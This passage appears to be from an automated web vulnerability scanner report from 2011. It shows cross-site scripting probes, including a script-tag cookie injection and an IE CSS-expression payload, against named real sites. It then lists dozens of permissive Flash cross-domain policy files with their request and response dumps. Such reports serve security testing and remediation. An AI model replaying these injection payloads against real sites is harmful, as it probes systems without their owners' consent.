Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==f30c9<script>alert(1)</script>174bae535a7; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 03 May 2011 10:21:51 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==f30c9<script>alert(1)</script>174bae535a7
userid:
</div>
...[SNIP]...

5.172. http://www.scriptlogic.com/downloadmanager/default.aspx [focus parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /downloadmanager/default.aspx

Issue detail

The value of the focus request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aecf'style%3d'x%3aexpr/**/ession(alert(1))'12ed669cb32 was submitted in the focus parameter. This input was echoed as 7aecf'style='x:expr/**/ession(alert(1))'12ed669cb32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /downloadmanager/default.aspx?focus=1087aecf'style%3d'x%3aexpr/**/ession(alert(1))'12ed669cb32 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://dl.scriptlogic.com/download/default.aspx?pid=1087aecf'style='x:expr/**/ession(alert(1))'12ed669cb32&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 346

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://dl.scriptlogic.com/download/default.aspx?pid=1087aecf'style='x:expr/**/ession(alert(1))'12ed669cb32&amp;r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com'>
...[SNIP]...

6. Flash cross-domain policy
There are 50 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://18.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 18.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.unanimis.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.unanimis.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "df384-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 03 May 2011 13:33:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ad.uk.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:35 GMT
Date: Tue, 03 May 2011 10:22:05 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://adfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 03 May 2011 10:22:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.6. http://aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:6d5c"
Server: Microsoft-IIS/6.0
X-Server: D1A
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 13:33:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:33:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.7. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 10:21:49 GMT
Date: Tue, 03 May 2011 10:21:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.8. http://cspix.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Tue, 03 May 2011 13:58:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.9. http://dis.us.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Tue, 03 May 2011 13:30:00 GMT
Expires: Fri, 27 Apr 2012 13:30:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.10. http://edge.aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a52"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Tue, 03 May 2011 13:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.11. http://g.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT
Accept-Ranges: bytes
ETag: "fee1eb39402ac91:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 13:22:31 GMT
Connection: keep-alive
Content-Length: 104

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.12. http://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:37 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.13. http://metrics.seenon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.seenon.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:23 GMT
Server: Omniture DC/2.0.0
xserver: www298
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.14. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:42:29 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.15. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012421000"
Last-Modified: Fri, 18 Feb 2011 07:00:21 GMT
Content-Type: application/xml
Content-Length: 211
Date: Tue, 03 May 2011 13:58:21 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.16. http://scriptlogiccorp.d2.sc.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Omniture DC/2.0.0
xserver: www308
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.17. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:85a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:48 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.18. http://tc.barclays.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.barclays.co.uk

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 10:22:51 GMT
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 03 May 2011 10:22:51 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 14:22:51 GMT;path=/

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.19. http://www.1day1year.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.1day1year.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1day1year.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 05 Apr 2011 16:30:37 GMT
Accept-Ranges: bytes
Content-Length: 254
Cache-Control: public
Expires: Thu, 02 Jun 2011 13:27:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
...[SNIP]...

6.20. http://www.bangkokpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bangkokpost.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 17 Oct 2010 17:54:45 GMT
ETag: "173825a-130-c1432340"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.21. http://www.newsroom.barclays.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsroom.barclays.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/xml
Date: Tue, 03 May 2011 10:21:44 GMT
Accept-Ranges: bytes
ETag: "0efee354d4cb1:0"
Connection: close
Last-Modified: Thu, 24 Feb 2011 09:21:26 GMT
X-Powered-By: ASP.NET
Content-Length: 106

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. https://adwords.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 01:25:15 GMT
Expires: Wed, 04 May 2011 01:25:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 42551

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.23. http://answers.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: answers.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
